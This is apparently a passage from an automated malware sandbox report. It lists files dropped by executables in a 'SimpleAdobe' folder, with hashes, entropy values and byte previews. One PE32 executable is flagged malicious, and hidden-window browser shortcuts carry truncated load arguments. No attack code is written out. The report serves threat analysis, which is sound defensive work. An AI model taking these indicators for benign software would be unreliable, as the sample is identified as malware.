                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.696703751818505
                                          Encrypted:false
                                          SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                          MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                          SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                          SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                          SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                          Malicious:false
                                          Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3134464
                                          Entropy (8bit):7.987488694347116
                                          Encrypted:false
                                          SSDEEP:49152:sa24nrYoeu14yHYne7V64z4APA5EtaUi7YcI5NtMQQDF4PAxf0NQdX1fwCm:Dncol14y4e7Vm0xaMcojM/DMAxf0yXF9
                                          MD5:F57F726F9E1B8C24B4F7C275FFAC78CF
                                          SHA1:339FED05D2D4A963E734E22741C89979D6B68B73
                                          SHA-256:AC9BF57379A94E559528BA283CBF74BF0DACF647CBB7F485437C361246FBD123
                                          SHA-512:C5BE34173BF2B710C57B4497A065FE19FB9DD62459EDFF56FDCC85363CCEDB53FC39989ED287DD07295A15E8DC86BF7902C68BD23E2B765CFC5B0ED94B56FA8F
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L....iLf...............'.....|..................@......................................@... .. .... .. ..........P.......,........`..4...................0........................................................................................................<..................@........................@..............@............P...P.......B..............@............ ...........J..............@....................b...J..............@....rsrc.... ...`......................@..@.........`y......(..................@....data.....!.......!.................@...................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:41 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                          Category:dropped
                                          Size (bytes):2222
                                          Entropy (8bit):3.4991168845013685
                                          Encrypted:false
                                          SSDEEP:48:8SidfTXdARYrnvVdAKRkdA0qOJq87dAKRFdAKRE:8S67O
                                          MD5:9E8C3B2831C9C09C213637E5D22FBA19
                                          SHA1:E75519431BD1C45AD53B0B93378E00B926C47042
                                          SHA-256:B01F0660C82E2DCD0ECDA797DB6F2F0B138CA40056C98CB6C4A1889D2CE5F268
                                          SHA-512:7F9F48A575D28F39A8F63C05B0E59252738FAA309888F2A6D719075CD76529A7C9C8A593D5C938F10A3D5BF7BB492FD60D31BB4EF2E386C76A1BDEEB2DB95503
                                          Malicious:false
                                          Preview:L..................F.@.. ......,....&:.e.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDWWn....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.A.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.@. .-.-.l.o.a.d.-
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 11:10:59 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
                                          Category:dropped
                                          Size (bytes):2568
                                          Entropy (8bit):3.686235682567051
                                          Encrypted:false
                                          SSDEEP:48:8sQJG+dOSzrhs+frnzldRdkqOJq5dLXuHj0PkFmq4:8G2hpuD0Pkkq
                                          MD5:8B908E879B7DBCBDD3B4B5B8905B5F51
                                          SHA1:8E0BE4CE3A1C67695D4BC40FE489A45D76A1C70F
                                          SHA-256:AAC00C5F6E587E29EB4EB784362C0C491C971E96271B42DCBB02F274A72D2156
                                          SHA-512:CFE1B6FB00A4770B4F0046E26EE270490D94184D6DEA650D12857B238FB2D724EE64E107411CAD1833A0B97CB47AAC92B8B8DCF696997D4FE2CD5568D216E0AF
                                          Malicious:false
                                          Preview:L..................F.@.. .....|.K....f......?......(>@.....................1....P.O. .:i.....+00.../C:\.....................1.....CWSa..PROGRA~2.........O.ICWSa....................V.......:.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....CW.`..MICROS~1..D......(Ux.CW.`..........................6|..M.i.c.r.o.s.o.f.t.....N.1.....CW\a0.Edge..:.......S8.CW\a...........................AI.E.d.g.e.....`.1.....CW`a0.APPLIC~1..H.......S8.CW`a..........................r.N.A.p.p.l.i.c.a.t.i.o.n.....`.2.(>@.=W2b .msedge.exe..F.......S8.CW`a....u.......................q.m.s.e.d.g.e...e.x.e.......k...............-.......j............F.......C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.H.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):96610
                                          Entropy (8bit):3.019620119415642
                                          Encrypted:false
                                          SSDEEP:1536:TlsQCy5UYa3RE1GUgeu4HQExgm+m+zF7e8D:TlsQCy5UYa3RE1GUgeu4HQExgm+m+zFF
                                          MD5:769C612518B4D718530A2DC8C4D8FE08
                                          SHA1:B6E57A935193B393D1A94A5EE57BA2D40F95C9FB
                                          SHA-256:0B56E56C07D8A1A805E4196A3C81106E060797DC5E90D43BE38CCB3B9FC1F8FA
                                          SHA-512:79EADB2AFDEB8408A49D6AF835642E3DB12E82DA20FB130D1ED753E33BE64EEEA184E79AD22414EB1BA64ED6F6EFF71E5D3B280B3737E305E93ECF34F7CF1F17
                                          Malicious:false
                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):13340
                                          Entropy (8bit):2.6939014490703497
                                          Encrypted:false
                                          SSDEEP:96:TiZYW9qex1HHwYLYVWgtuHgYEZ6mtFiu36yVwntihxpaelOZeMM0OHIT3OE:2ZD9esUMToxpaelOZeMM0OoT3OE
                                          MD5:FD99DE233A08BC51D8A5030AC6EB314F
                                          SHA1:8C060A8C11FF15E45BE75FD233982B4F2D94F3D1
                                          SHA-256:125CC36285A77AEC30E84E4ABED22BAB6C63E218074983177A9EADD10000533C
                                          SHA-512:4EE60F5E920D9BF651A4F667A4C23C5A69008ED51ECB182AAC328734FC8F718835372A35ABFDB314F42480904C9CF7AFD8CC5B831C24DD5EA5EA622A41BA80AA
                                          Malicious:false
                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):101790
                                          Entropy (8bit):3.016260031122757
                                          Encrypted:false
                                          SSDEEP:3072:5KN0pXc9a5vGY7qrNEcGUtlh4Cxgm+m+tm0mtrkUqkvusdkr:p
                                          MD5:FAD1957BE5DBC85B421A987C2BEA14E8
                                          SHA1:483B6767D73AE4EED60DEC80579D3DFA1026768C
                                          SHA-256:E83E7A509B52302B3356373BD28F76032134350AC27F9C66DDEE0A466821F900
                                          SHA-512:A110D5F895F6FB0EECE412CDD22946CC067572274268632856DECB1A50302903A18730D71E5A95FBF1ED66957582087FCE178D8D63B45C940C658A7A0BB27116
                                          Malicious:false
                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):91956
                                          Entropy (8bit):3.019016153270425
                                          Encrypted:false
                                          SSDEEP:1536:nqybGYBV2pzRC6ZjuPDzuSunWsm5BlFXW+B+b+f+Z+a+E+4+i+V+0To+IvqvlA+6:nqybGYBV2pzRC6ZjuPDzuSunWsm5BlFu
                                          MD5:ACF9FCCDA95A775D6E983993AC813E7C
                                          SHA1:600489393FC35C8B5AD4D2DCBB796206ED27C99A
                                          SHA-256:F428321B729118DA2C724E0B83D6B0B20C9C72E77E80B0BCF9BEB0B6890AD3C0
                                          SHA-512:28B32BF909014F7B7D376E057C2231ED668F68DFA5663089A8E6AF8591C51BFB5562925AB4987E6BB826B77DDA4AEF4EE7FCE7DD8C50D0C2D9611539FB668DB6
                                          Malicious:false
                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):13340
                                          Entropy (8bit):2.698615098146878
                                          Encrypted:false
                                          SSDEEP:96:TiZYWgcNlQvYMYvScWH1YEZg/KtriL+uyfwc+WBNaml4BMj0ZIv3F:2ZD5obi//INamlUMj0Gv3F
                                          MD5:343A7A7AAFE93ECA85AD11052A247D78
                                          SHA1:574917BE90D0E17775B4ABE07A527EDFAA02AB20
                                          SHA-256:9F89A50BC6C06153D2EAB61E92F412741F5553B212A1B1489B616E6ED0DDCD52
                                          SHA-512:AF262012C7F647B15D06C0D4B33BDD51C26F8E32FC7B63191D3A5F2CCF794E3591D043F4CFC1F251DE509E164AE337818E8D59ECF15D5C79F371E9B88871D741
                                          Malicious:false
                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):91978
                                          Entropy (8bit):3.0190098646595165
                                          Encrypted:false
                                          SSDEEP:1536:AColGmgV2SAzRFJOajuPDzuUWnysm5BmSXW+B+b+f+Z+a+E+4+i+V+0To+Ivqvll:AColGmgV2SAzRFJOajuPDzuUWnysm5Bz
                                          MD5:C3DEBF3AE97F08818A1D181894317848
                                          SHA1:A52430F74FD1C1BCAF77C67F51B8993BB0AE7EF5
                                          SHA-256:2CB7F4682FF24CF4CC217CBF110F455AB0F920C865C2395488E74EED6E336635
                                          SHA-512:55CA4A487F29ED677E8E76C86C909468629290D41C73EFB74D3E818EA79ABED60C220950D408BA7A696C0E5E6A4FFCDB984EBC505D5FFF348C41A7D7CCE32D1D
                                          Malicious:false
                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):13340
                                          Entropy (8bit):2.698992216251179
                                          Encrypted:false
                                          SSDEEP:96:TiZYW25p9ZY4YtBS5uH1YEZQ/E0triE+kyfwL+zBYvablHM508Im3F:2ZDS/KC/3kyablHM507m3F
                                          MD5:B68FA931E23F09BEF705CE4E33A22383
                                          SHA1:7515698C6A8E2DC510AAE7F577D2CF59D2F9B475
                                          SHA-256:CFF3134B54A25A281F768E210E4D4F231848F8FAAC164EDDFFE2126195879A94
                                          SHA-512:7B62B2696F80A69D53279E89358AA4A473CF7E91224719C7E9639CC78EC7DD99A0329D18D4F1C685A51C75547895BE4C94A7D71D95F2FAF856EFFDF78E20B40B
                                          Malicious:false
                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):13340
                                          Entropy (8bit):2.694633237880159
                                          Encrypted:false
                                          SSDEEP:96:TiZYW9vw7l4SYgYaWlRHGYEZ3dtFiT3dypw2EyeaCl5HMS05lIa35D:2ZD9YR3G6x7eaClZMS00a3d
                                          MD5:B264BB47BCE551E83BC170965016AED3
                                          SHA1:53631A50C84B671CC21C5E96919839754664A86B
                                          SHA-256:AAF7A1FFC0D394484473845859A37846E616A042ED2B23E1542FF817DD21EE75
                                          SHA-512:9B8C576AC95F2F416C04ED4590451EF59F12FBC6942BC01408B728458986C218F81FE4F6BEAE2C1488F3C49B593FF21DC019C47E4783333255C4E53BFE05784F
                                          Malicious:false
